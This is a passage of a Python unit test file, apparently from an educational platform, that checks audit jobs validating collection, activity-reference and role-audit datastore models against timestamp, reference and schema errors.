'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.created_on, self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'ActivityReferencesModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_missing_id_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'exploration',
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for fetch properties of '
'ActivityReferencesModel\', '
'[u"Entity id featured: Entity properties cannot be fetched '
'completely with the error \'id\'"]]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_type_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'invalid_type',
'id': '0'
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for domain object check of '
'ActivityReferencesModel\', '
'[u\'Entity id featured: Entity fails domain validation with the '
'error Invalid activity type: invalid_type\']]')]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id_in_activity_references(self):
self.model_instance.activity_references = [{
'type': 'exploration',
'id': '1col'
}]
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for exploration_ids field check of '
'ActivityReferencesModel\', '
'[u"Entity id featured: based on field exploration_ids having '
'value 1col, expect model ExplorationModel with id 1col but '
'it doesn\'t exist"]]')]
run_job_and_check_output(self, expected_output)
def test_mock_model_with_invalid_id(self):
model_instance_with_invalid_id = (
activity_models.ActivityReferencesModel(id='invalid'))
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated ActivityReferencesModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'ActivityReferencesModel\', '
'[u\'Entity id invalid: Entity id does not match regex pattern\']]'
)]
run_job_and_check_output(self, expected_output, sort=True)
class RoleQueryAuditModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(RoleQueryAuditModelValidatorTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
admin_model = user_models.UserSettingsModel.get_by_id(self.admin_id)
admin_model.role = feconf.ROLE_ID_ADMIN
admin_model.put()
model_id = '%s.%s.%s.%s' % (
self.admin_id, int(math.floor(time.time())),
feconf.ROLE_ACTION_UPDATE, random.randint(0, 1000))
self.model_instance = audit_models.RoleQueryAuditModel(
id=model_id, user_id=self.admin_id,
intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off.RoleQueryAuditModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated RoleQueryAuditModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of RoleQueryAuditModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'RoleQueryAuditModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_user_id(self):
user_models.UserSettingsModel.get(self.admin_id).delete()
expected_output = [(
u'[u\'failed validation check for user_ids field check of '
'RoleQueryAuditModel\', '
'[u"Entity id %s: based on field user_ids having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.admin_id, self.admin_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_invalid_id = '%s.%s.%s.%s' % (
'a', int(math.floor(time.time())), feconf.ROLE_ACTION_UPDATE,
random.randint(0, 1000))
model_instance_with_invalid_id = audit_models.RoleQueryAuditModel(
id=model_invalid_id, user_id=self.admin_id,
intent=feconf.ROLE_ACTION_UPDATE, role='c', username='d')
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated RoleQueryAuditModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'RoleQueryAuditModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % model_invalid_id]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
language_codes = ['ar', 'en', 'en']
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance_0 = collection_models.CollectionModel.get_by_id('0')
self.model_instance_1 = collection_models.CollectionModel.get_by_id('1')
self.model_instance_2 = collection_models.CollectionModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.CollectionModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of CollectionModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_collection_schema(self):
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'CollectionModel\', '
'[u\'Entity id %s: Entity fails domain validation with the '
'error Invalid language code: %s\']]'
) % (self.model_instance_0.id, self.model_instance_0.language_code),
u'[u\'fully-validated CollectionModel\', 2]']
with self.swap(
constants, 'ALL_LANGUAGE_CODES', [{
'code': 'en', 'description': 'English'}]):
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('1').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for '
'exploration_ids field check of CollectionModel\', '
'[u"Entity id 0: based on field exploration_ids having value '
'1, expect model ExplorationModel '
'with id 1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_commit_log_entry_model_failure(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
collection_models.CollectionCommitLogEntryModel.get_by_id(
'collection-0-1').delete()
expected_output = [
(
u'[u\'failed validation check for '
'collection_commit_log_entry_ids field check of '
'CollectionModel\', '
'[u"Entity id 0: based on field '
'collection_commit_log_entry_ids having value '
'collection-0-1, expect model CollectionCommitLogEntryModel '
'with id collection-0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_summary_model_failure(self):
collection_models.CollectionSummaryModel.get_by_id('0').delete()
expected_output = [
(
u'[u\'failed validation check for collection_summary_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field collection_summary_ids '
'having value 0, expect model CollectionSummaryModel with '
'id 0 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id(
'0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field collection_rights_ids having '
'value 0, expect model CollectionRightsModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model CollectionSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
collection_models.CollectionSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of CollectionModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model CollectionSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(CollectionSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
if collection.id != '0':
collection_services.save_new_collection(
self.owner_id, collection)
else:
collection_services.save_new_collection(
self.user_id, collection)
self.model_instance_0 = (
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionSnapshotMetadataModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field collection_ids '
'having value 0, expect model CollectionModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_ids having value 0, expect model '
'CollectionModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'CollectionSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection model '
'version check of CollectionSnapshotMetadataModel\', '
'[u\'Entity id 0-3: Collection model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated CollectionSnapshotMetadataModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_collection_node',
}, {
'cmd': 'delete_collection_node',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'delete_collection_node check of '
'CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_collection_node\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'exploration_id, The following extra attributes '
'are present: invalid_attribute"]]'
), (
u'[u\'failed validation check for commit cmd '
'add_collection_node check of '
'CollectionSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_collection_node\'} failed '
'with error: The following required attributes are '
'missing: exploration_id"]]'
), u'[u\'fully-validated CollectionSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
self.model_instance_0 = (
collection_models.CollectionSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
collection_services.update_collection(
self.owner_id, '0', [{
'cmd': 'edit_collection_property',
'property_name': 'title',
'new_value': 'New title'
}], 'Changes.')
expected_output = [
u'[u\'fully-validated CollectionSnapshotContentModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionSnapshotContentModel\', '
'[u"Entity id 0-1: based on field collection_ids '
'having value 0, expect model CollectionModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_ids having value 0, expect model '
'CollectionModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_collection_version_in_model_id(self):
model_with_invalid_version_in_id = (
collection_models.CollectionSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for collection model '
'version check of CollectionSnapshotContentModel\', '
'[u\'Entity id 0-3: Collection model corresponding to '
'id 0 has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
), (
u'[u\'fully-validated CollectionSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
collection_services.save_new_collection(self.owner_id, collection)
rights_manager.assign_role_for_collection(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_collection(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
self.model_instance_0 = (
collection_models.CollectionRightsModel.get_by_id('0'))
self.model_instance_1 = (
collection_models.CollectionRightsModel.get_by_id('1'))
self.model_instance_2 = (
collection_models.CollectionRightsModel.get_by_id('2'))
self.job_class = (
prod_validation_jobs_one_off.CollectionRightsModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_collection(self.owner, '0')
expected_output = [
u'[u\'fully-validated CollectionRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_collection(self.owner, '0')
rights_manager.publish_collection(self.owner, '1')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of CollectionRightsModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the job was '
'run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_model_failure(self):
collection_models.CollectionModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field collection_ids having '
'value 0, expect model CollectionModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_collection(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model '
'CollectionRightsSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
collection_models.CollectionRightsSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of CollectionRightsModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model CollectionRightsSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated CollectionRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(CollectionRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(6)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
collections = [collection_domain.Collection.create_default_collection(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
objective='objective%d' % i,
) for i in xrange(3)]
for index, collection in enumerate(collections):
collection.add_node('%s' % (index * 2))
collection.add_node('%s' % (index * 2 + 1))
if collection.id != '0':
collection_services.save_new_collection(
self.owner_id, collection)
else:
collection_services.save_new_collection(
self.user_id, collection)
self.model_instance_0 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.CollectionRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated CollectionRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'CollectionRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_collection_rights_model_failure(self):
collection_models.CollectionRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for collection_rights_ids '
'field check of CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field collection_rights_ids '
'having value 0, expect model CollectionRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'collection_rights_ids having value 0, expect model '
'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'CollectionRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of CollectionRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
